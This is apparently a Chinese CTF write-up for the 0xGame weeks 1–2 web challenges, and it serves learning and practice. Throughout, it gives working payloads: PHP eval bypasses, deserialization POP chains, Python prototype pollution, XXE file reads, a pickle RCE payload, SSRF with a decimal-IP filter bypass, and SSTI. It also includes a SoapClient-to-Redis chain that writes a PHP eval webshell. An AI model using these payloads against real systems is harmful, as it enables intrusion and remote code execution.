week1
RCE1
考点:或运算构造system
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
<?php
error_reporting(0);
highlight_file(__FILE__);
$rce1 = $_GET['rce1'];
$rce2 = $_POST['rce2'];
$real_code = $_POST['rce3'];
$pattern = '/(?:\d|[\$%&#@*]|system|cat|flag|ls|echo|nl|rev|more|grep|cd|cp|vi|passthru|shell|vim|sort|strings)/i';
function check(string $text): bool {
global $pattern;
return (bool) preg_match($pattern, $text);
}
if (isset($rce1) && isset($rce2)){
if(md5($rce1) === md5($rce2) && $rce1 !== $rce2){
if(!check($real_code)){
eval($real_code);
} else {
echo "Don't hack me ~";
}
} else {
echo "md5 do not match correctly";
}
}
else{
echo "Please provide both rce1 and rce2";
}
?>
|
1
|
print_r(scandir('/')); //查根目录文件
|
1
|
(systee|systel)('tac /f???'); //直接一或运算将system构造出来
|
Lemon
ctrl+U直接拿flag
Http的真理,我已解明
八股文,注意最后这个要求clash代理,用请求头Via: clash
Rubbish_Unser
考点:hash触发Exception中__toString魔术绕过hash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
|
<?php
error_reporting(0);
highlight_file(__FILE__);
class ZZZ
{
public $yuzuha;
function __construct($yuzuha)
{
$this -> yuzuha = $yuzuha;
}
function __destruct()
{
echo "破绽,在这里!" . $this -> yuzuha;
}
}
class HSR
{
public $robin;
function __get($robin)
{
$castorice = $this -> robin;
eval($castorice);
}
}
class HI3rd
{
public $RaidenMei;
public $kiana;
public $guanxing;
function __invoke()
{
if($this -> kiana !== $this -> RaidenMei && md5($this -> kiana) === md5($this -> RaidenMei) && sha1($this -> kiana) === sha1($this -> RaidenMei))
return $this -> guanxing -> Elysia;
}
}
class GI
{
public $furina;
function __call($arg1, $arg2)
{
$Charlotte = $this -> furina;
return $Charlotte();
}
}
class Mi
{
public $game;
function __toString()
{
$game1 = @$this -> game -> tks();
return $game1;
}
}
if (isset($_GET['0xGame'])) {
$web = unserialize($_GET['0xGame']);
throw new Exception("Rubbish_Unser");
}
?>
|
很简单链子,垃圾回收去掉最后一个}去绕过,hash用Exception绕过
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
|
<?php
error_reporting(0);
class ZZZ
{
public $yuzuha;
function __construct($yuzuha)
{
$this -> yuzuha = $yuzuha;
}
function __destruct()
{
echo "破绽,在这里!" . $this -> yuzuha;
}
}
class HSR
{
public $robin="system('env');";
function __get($robin)
{
echo "4";
$castorice = $this -> robin;
eval($castorice);
}
}
class HI3rd
{
public $RaidenMei;
public $kiana;
public $guanxing;
function __invoke()
{
echo "3";
if($this -> kiana !== $this -> RaidenMei && md5($this -> kiana) === md5($this -> RaidenMei) && sha1($this -> kiana) === sha1($this -> RaidenMei))
return $this -> guanxing -> Elysia;
}
}
class GI
{
public $furina;
function __call($arg1, $arg2)
{
echo "2";
$Charlotte = $this -> furina;
return $Charlotte();
}
}
class Mi
{
public $game;
function __toString()
{
echo "1";
$game1 = @$this -> game -> tks();
return $game1;
}
}
$a=new ZZZ(1);
$a-> yuzuha=new Mi();
$a-> yuzuha->game=new GI();
$a-> yuzuha->game->furina=new HI3rd();
$a-> yuzuha->game->furina->kiana=new Exception("",1);$a-> yuzuha->game->furina->RaidenMei=new Exception("",2);
$a-> yuzuha->game->furina->guanxing=new HSR();
echo urlencode(serialize($a));
?>
|
Lemon_RevEnge
考点:污染os.path.pardir进行目录穿越
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
|
from flask import Flask,request,render_template
import json
import os
app = Flask(__name__)
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
class Dst():
def __init__(self):
pass
Game0x = Dst()
@app.route('/',methods=['POST', 'GET'])
def index():
if request.data:
merge(json.loads(request.data), Game0x)
return render_template("index.html", Game0x=Game0x)
@app.route("/<path:path>")
def render_page(path):
if not os.path.exists("templates/" + path):
return "Not Found", 404
return render_template(path)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=9000)
|
1
2
3
4
5
6
7
8
9
10
11
|
{
"__init__":{
"__globals__":{
"os":{
"path":{
"pardir":"!"
}
}
}
}
}
|
Python原型链污染 – Jaren’s Blog
浅谈Python原型链污染及利用方式-先知社区
留言板(粉)
admin/admin123登入,发现网页名字提示是打xxe
1
2
3
4
|
<!DOCTYPE evil [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<user><username>&xxe;</username><password>&xxe;</password></user>
|
留言板_reVenge
很懵逼,都是直接无过滤无回显xxe打完了
week2
你好,爪洼脚本
考aaEncode加密
aaEncode加密解密工具
1
|
0xGame{Hello,JavaScript}
|
马哈鱼商店
考点:pickle反序列化(文本协议)
买flag是假的,买pickle,将折扣改成0.0001就行
1
2
|
Use GET To Send Your Loved Data!!! BlackList = [b'', b'�'] @app.route('/pickle_dsa') def pic(): data = request.args.get('data') if not data: return "Use GET To Send Your Loved Data" try: data = base64.b64decode(data) except Exception: return "Cao!!!" for b in BlackList: if b in data: return "卡了" p = pickle.loads(data) print(p) return f"
Vamos! {p}
|
打pickle反序列化
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
import pickle
import base64
import os
class P(object):
def __reduce__(self):
return (eval, ("__import__('os').popen('env').read()",))
payload = pickle.dumps(P(), protocol=0)
b64_payload = base64.b64encode(payload)
print(payload)
print(b64_payload.decode())
|
注意这要用protocol=0(文本协议),b’’ 是单个字节 0x1E(ASCII Record Separator)。它想拦包含该字节的数据。Pickle 的二进制协议很容易出现各种非可打印字节(包括 0x1E),而文本协议(protocol=0)通常不会包含 0x1E,所以用 protocol=0 构造 payload,避免 0x1E。
DNS想要玩
考点:进制绕过黑名单进行dns解析
题目给了源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
|
from flask import Flask, request
from urllib.parse import urlparse
import socket
import os
app = Flask(__name__)
BlackList = [
'localhost', '@', '172', 'gopher', 'file', 'dict', 'tcp', '0.0.0.0', '114.5.1.4'
]
def check(url: str) -> bool:
parsed = urlparse(url)
host = parsed.hostname
if not host:
return False
host_ascii = host.encode('idna').decode('utf-8')
try:
ip = socket.gethostbyname(host_ascii)
except Exception:
return False
return ip == '114.5.1.4'
@app.route('/')
def index():
return open(__file__, 'r', encoding='utf-8').read()
@app.route('/ssrf')
def ssrf():
raw_url = request.args.get('url')
if not raw_url:
return 'URL Needed'
for u in BlackList:
if u in raw_url:
return 'Invaild URL'
if check(raw_url):
cmd = request.args.get('cmd', '')
return os.popen(cmd).read()
else:
return 'NONONO'
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8000)
|
1
|
ssrf?url=http://1912930564/&cmd=cat%20/f*
|
很多办法,用进制绕过就行,我这里用10进制绕过
ctfshow-web-351-360-ssrf-wp_ctfshow web360-CSDN博客
这真的是反序列化
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
|
<?php
highlight_file(__FILE__);
error_reporting(0);
//hint: Redis20251206
class pure{
public $web;
public $misc;
public $crypto;
public $pwn;
public function __construct($web, $misc, $crypto, $pwn){
$this->web = $web;
$this->misc = $misc;
$this->crypto = $crypto;
$this->pwn = $pwn;
}
public function reverse(){
$this->pwn = new $this->web($this->misc, $this->crypto);
}
public function osint(){
$this->pwn->play_0xGame();
}
public function __destruct(){
$this->reverse();
$this->osint();
}
}
$AI = $_GET['ai'];
$ctf = unserialize($AI);
?>
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
<?php
class pure
{
public $web = 'SoapClient';
public $misc = Null;
public $crypt;
public $pwn;
}
$target = 'http://127.0.0.1:6379/';
$poc1 = "AUTH 20251206";
$poc2 = "CONFIG SET dir /var/www/html";
$poc3 = "SET x '<?@eval(\$_POST[1]);?>'";
$poc4 = "CONFIG SET dbfilename shell.php";
$poc5 = "SAVE";
$a = array('location' => $target, 'uri' =>
'ai^^' . $poc1 . '^^' . $poc2 . '^^' . $poc3 . '^^' . $poc4 . '^^' . $poc5 . '^^ai');
$b = serialize($a);
$b = str_replace('^^', "\r\n", $b);
$c = unserialize($b);
|
404NotFound
测试一下ssti
过滤了一些关键词和点
1
|
{{lipsum['__glo''bals__']['o''s']['po''pen']('cat /f*')['re''ad']()}}
|
Plus_plus
输入?0xGame=1得到源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
<?php
error_reporting(0);
if (isset($_GET['0xGame'])) {
highlight_file(__FILE__);
}
if (isset($_POST['web'])) {
$web = $_POST['web'];
if (strlen($web) <= 120) {
if (is_string($web)) {
if (!preg_match("/[!@#%^&*:'\-<?>\"\/|`a-zA-BD-GI-Z~\\\\]/", $web)) {
eval($web);
} else {
echo("NONONO!");
}
} else {
echo "No String!";
}
} else {
echo "too long!";
}
}
?>
|